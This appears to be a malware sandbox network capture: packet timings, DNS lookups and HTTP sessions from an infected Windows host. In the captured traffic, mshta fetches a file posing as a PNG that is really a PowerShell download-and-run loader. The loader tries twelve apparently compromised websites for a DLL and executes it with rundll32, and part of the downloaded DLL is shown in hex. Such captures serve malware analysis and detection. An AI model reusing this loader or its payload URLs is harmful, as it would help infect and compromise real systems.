                                                                                                                                  Jan 28, 2022 21:04:52.595676899 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595694065 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595721006 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595729113 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595747948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595773935 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595782042 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595801115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.595834970 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.595853090 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597094059 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597161055 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597307920 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597337008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597363949 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597379923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597389936 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597419977 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597429991 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597450972 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597476959 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597486973 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597503901 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597531080 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597538948 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597558975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597585917 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597594976 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597613096 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597639084 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597649097 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597667933 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597693920 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597702980 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597721100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597748041 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597754955 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597775936 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597803116 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597811937 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597830057 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597866058 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.597872972 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597903013 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597929001 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.597937107 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:54.882982969 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883100986 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883119106 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883383989 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883483887 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883497953 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883543968 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883565903 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883690119 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883706093 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883735895 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.883862019 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.883883953 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.884037018 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.884181976 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.884200096 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885268927 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885404110 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.885420084 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885449886 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.885590076 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.885607004 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886579037 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.886585951 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886656046 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886748075 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.886831045 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.886948109 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.887046099 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.887063026 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.887080908 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:54.887216091 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:54.889983892 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.014722109 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.014925003 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015019894 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015063047 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015088081 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015096903 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015402079 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015541077 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015562057 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015665054 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015782118 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.015796900 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.015980959 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016141891 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016304970 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016413927 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016546965 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016558886 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016648054 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016767025 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016781092 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016822100 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.016933918 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.016944885 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017044067 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017111063 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017239094 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017251015 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017333031 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017563105 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017671108 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017674923 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017697096 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017762899 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017803907 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.017879963 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.017991066 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018094063 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.018104076 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018239975 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018268108 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.018279076 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.018310070 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019227028 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019319057 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019330978 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019342899 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019439936 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019443035 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019459963 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019527912 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019541025 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019558907 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.019651890 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.019663095 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020558119 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020646095 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020658970 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.020705938 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.020721912 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.023771048 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.147635937 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.147758007 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.147785902 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.147852898 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.147932053 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.147949934 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.148489952 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.148607016 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.148622036 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.148978949 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149054050 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149064064 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.149080992 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149125099 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.149135113 CET44349169162.241.211.118192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:55.149189949 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:55.151882887 CET49169443192.168.2.22162.241.211.118
                                                                                                                                  Jan 28, 2022 21:04:57.370567083 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:57.370646000 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:05:51.849528074 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:05:51.849664927 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:06:26.879585981 CET4916680192.168.2.2291.240.118.168
                                                                                                                                  Jan 28, 2022 21:06:26.938271046 CET804916691.240.118.168192.168.2.22
                                                                                                                                  Jan 28, 2022 21:06:28.625668049 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:29.421094894 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:30.996803045 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:32.896594048 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:33.664750099 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:34.117095947 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:35.224829912 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:38.376245975 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:40.373225927 CET4916780192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:06:44.539170980 CET4916880192.168.2.22103.138.189.128
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:04:46.893945932 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:04:46.912362099 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 21:04:48.616856098 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:04:49.015062094 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 21:04:52.948641062 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:04:52.967462063 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:04:46.893945932 CET | 192.168.2.22 | 8.8.8.8 | 0x3d32 | Standard query (0) | praachichemfood.com | A (IP address) | IN (0x0001)
Jan 28, 2022 21:04:48.616856098 CET | 192.168.2.22 | 8.8.8.8 | 0x352 | Standard query (0) | www.praachichemfood.com | A (IP address) | IN (0x0001)
Jan 28, 2022 21:04:52.948641062 CET | 192.168.2.22 | 8.8.8.8 | 0x9263 | Standard query (0) | dtmconsulting.ca | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:04:46.912362099 CET | 8.8.8.8 | 192.168.2.22 | 0x3d32 | No error (0) | praachichemfood.com |  | 103.138.189.128 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:04:49.015062094 CET | 8.8.8.8 | 192.168.2.22 | 0x352 | No error (0) | www.praachichemfood.com | praachichemfood.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 28, 2022 21:04:49.015062094 CET | 8.8.8.8 | 192.168.2.22 | 0x352 | No error (0) | praachichemfood.com |  | 103.138.189.128 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:04:52.967462063 CET | 8.8.8.8 | 192.168.2.22 | 0x9263 | No error (0) | dtmconsulting.ca |  | 162.241.211.118 | A (IP address) | IN (0x0001)
                                                                                                                                  • dtmconsulting.ca
                                                                                                                                  • 91.240.118.168
                                                                                                                                  • praachichemfood.com
                                                                                                                                  • www.praachichemfood.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49169 | 162.241.211.118 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49165 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:04:41.911645889 CET | 0 | OUT | GET /zqqw/zaas/fe.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.240.118.168
Connection: Keep-Alive
Jan 28, 2022 21:04:41.972903013 CET | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 28 Jan 2022 20:04:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11027
Last-Modified: Thu, 27 Jan 2022 13:05:00 GMT
Connection: keep-alive
ETag: "61f2987c-2b13"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49166 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:04:46.790334940 CET | 13 | OUT | GET /zqqw/zaas/fe.png HTTP/1.1
Host: 91.240.118.168
Connection: Keep-Alive
Jan 28, 2022 21:04:46.848853111 CET | 14 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 28 Jan 2022 20:04:46 GMT
Content-Type: image/png
Content-Length: 1190
Last-Modified: Thu, 27 Jan 2022 13:01:02 GMT
Connection: keep-alive
ETag: "61f2978e-4a6"
Accept-Ranges: bytes
                                                                                                                                  Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://praachichemfood.com/public_html/SWmteCWBUkA89/';$url2 = 'https://dtmconsulting.ca/wp-includes/dkCFwyE/';$url3 = 'https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/';$url4 = 'https://worldaviationhub.com/wp-includes/Lik/';$url5 = 'http://bakultante.com/tee5oeot/Q/';$url6 = 'https://onewaymedia.ro/wp-includes/k/';$url7 = 'https://lodev7.com/wp-content/dpwjiJivrpgO1F2/';$url8 = 'https://trochoi80club.com/wp-content/6shnRU/';$url9 = 'https://haileywells.com/cgi-bin/KJUOaq/';$url10 = 'https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/';$url11 = 'http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/';$url12 = 'https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}
Jan 28, 2022 21:04:46.848866940 CET | 14 | IN |
                                                                                                                                  Data Ascii: } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\QWER.dll',BBDD;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49167 | 103.138.189.128 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:04:47.230521917 CET | 15 | OUT | GET /public_html/SWmteCWBUkA89/ HTTP/1.1
Host: praachichemfood.com
Connection: Keep-Alive
Jan 28, 2022 21:04:48.596137047 CET | 15 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 28 Jan 2022 20:04:47 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.3.31
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://www.praachichemfood.com/public_html/SWmteCWBUkA89/
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Jan 28, 2022 21:04:48.613080025 CET | 15 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49168 | 103.138.189.128 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:04:49.322189093 CET | 16 | OUT | GET /public_html/SWmteCWBUkA89/ HTTP/1.1
Host: www.praachichemfood.com
Connection: Keep-Alive
Jan 28, 2022 21:04:50.743541002 CET | 16 | IN | HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2022 20:04:49 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.3.31
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.praachichemfood.com/wp-json/>; rel="https://api.w.org/"
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 2
Jan 28, 2022 21:04:50.743566990 CET | 17 | IN |
Data Ascii: 17<!DOCTYPE html><html
Jan 28, 2022 21:04:50.743750095 CET | 17 | IN |
Data Ascii: 106lang="en-US" class="ut-no-js">...##########################################################################################BROOKLYN THEME BY UNITED THEMESDESIGNED BY MARCEL MOERKENSDEVELOPED BY MARCEL MOERKENS & MATTHIAS
Jan 28, 2022 21:04:50.744501114 CET | 17 | IN |
Data Ascii: 864.9.7.2r##########################################################################################--><head> <meta charset="
Jan 28, 2022 21:04:50.745362997 CET | 17 | IN |
Data Ascii: 85UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
Jan 28, 2022 21:04:50.746299982 CET | 18 | IN |
Data Ascii: 34 <meta name="description" content="
Jan 28, 2022 21:04:50.746504068 CET | 18 | IN |
Data Ascii: 5dpraachichemfood.com"> ... RSS & Pingbacks --><link rel="pingback" href="
Jan 28, 2022 21:04:50.746525049 CET | 18 | IN |
Data Ascii: 85http://www.praachichemfood.com/xmlrpc.php" /> <link rel="profile" href="https://gmpg.org/xfn/11"> ... Favicon -->
Jan 28, 2022 21:04:50.747564077 CET | 18 | IN |
Data Ascii: 12
Jan 28, 2022 21:04:50.747831106 CET | 19 | IN |
                                                                                                                                  Data Ascii: 156 <link rel="shortcut&#x20;icon" href="http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png" type="image/png" /> <link rel="icon" href="http://praachichemfood.com/wp-content/them
                                                                                                                                  Jan 28, 2022 21:04:51.049526930 CET20INData Raw: 32 37 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 0d 0a 35 64 0d 0a 68 74 74 70 3a 2f 2f 70 72 61 61 63 68 69 63 68 65 6d 66 6f 6f 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e
                                                                                                                                  Data Ascii: 27 <link rel="apple-touch-icon" href="5dhttp://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png"> 35 <link rel="apple-touch-icon" sizes="72x72" href="5fhttp://praachichemfood.com/wp-conten


Session ID: 0
Source IP: 192.168.2.22
Source Port: 49169
Destination IP: 162.241.211.118
Destination Port: 443
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2022-01-28 20:04:53 UTC | 0 | OUT | GET /wp-includes/dkCFwyE/ HTTP/1.1
Host: dtmconsulting.ca
Connection: Keep-Alive
2022-01-28 20:04:53 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 28 Jan 2022 20:04:53 GMT
                                                                                                                                  Server: Apache/2.4.52 (cPanel) OpenSSL/1.1.1m mod_bwlimited/1.4
                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Fri, 28 Jan 2022 20:04:53 GMT
                                                                                                                                  Content-Disposition: attachment; filename="e21HfoMWQuR1.dll"
                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                  Set-Cookie: 61f44c65b4443=1643400293; expires=Fri, 28-Jan-2022 20:05:53 GMT; Max-Age=60; path=/
                                                                                                                                  Last-Modified: Fri, 28 Jan 2022 20:04:53 GMT
                                                                                                                                  Content-Length: 548864
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  Data Ascii: <@N0N ^y4?rqjq7jsP F3C3tj9~8u@j7XYM;}tv@3MSvDF8N8WI8^49}{uN8)N4F4k9~8uDjWYM;]t63v@MSF8F89x@8^49}t
                                                                                                                                  2022-01-28 20:04:54 UTC195INData Raw: 45 e4 85 c0 0f 84 83 00 00 00 57 56 53 e8 44 19 fe ff 89 45 e4 83 fe 01 75 24 85 c0 75 20 57 50 53 e8 30 19 fe ff 57 6a 00 53 e8 9e fd ff ff a1 a8 9b 04 10 85 c0 74 06 57 6a 00 53 ff d0 85 f6 74 05 83 fe 03 75 26 57 56 53 e8 7e fd ff ff 85 c0 75 03 21 45 e4 83 7d e4 00 74 11 a1 a8 9b 04 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 c7 45 fc fe ff ff ff 8b 45 e4 eb 1d 8b 45 ec 8b 08 8b 09 50 51 e8 61 83 00 00 59 59 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 e8 78 1e 00 00 c3 83 7c 24 08 01 75 05 e8 5b 83 00 00 ff 74 24 04 8b 4c 24 10 8b 54 24 0c e8 ed fe ff ff 59 c2 0c 00 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24 0c 53 56 57 89 28 8b e8 a1 cc 45 05 10 33 c5 50 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 a3 00 00 00 00 c3 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24
                                                                                                                                  Data Ascii: EWVSDEu$u WPS0WjStWjStu&WVS~u!E}ttWVSEEEEPQaYYeE3x|$u[t$L$T$YPd5D$+d$SVW(E3PuEEdPd5D$+d$
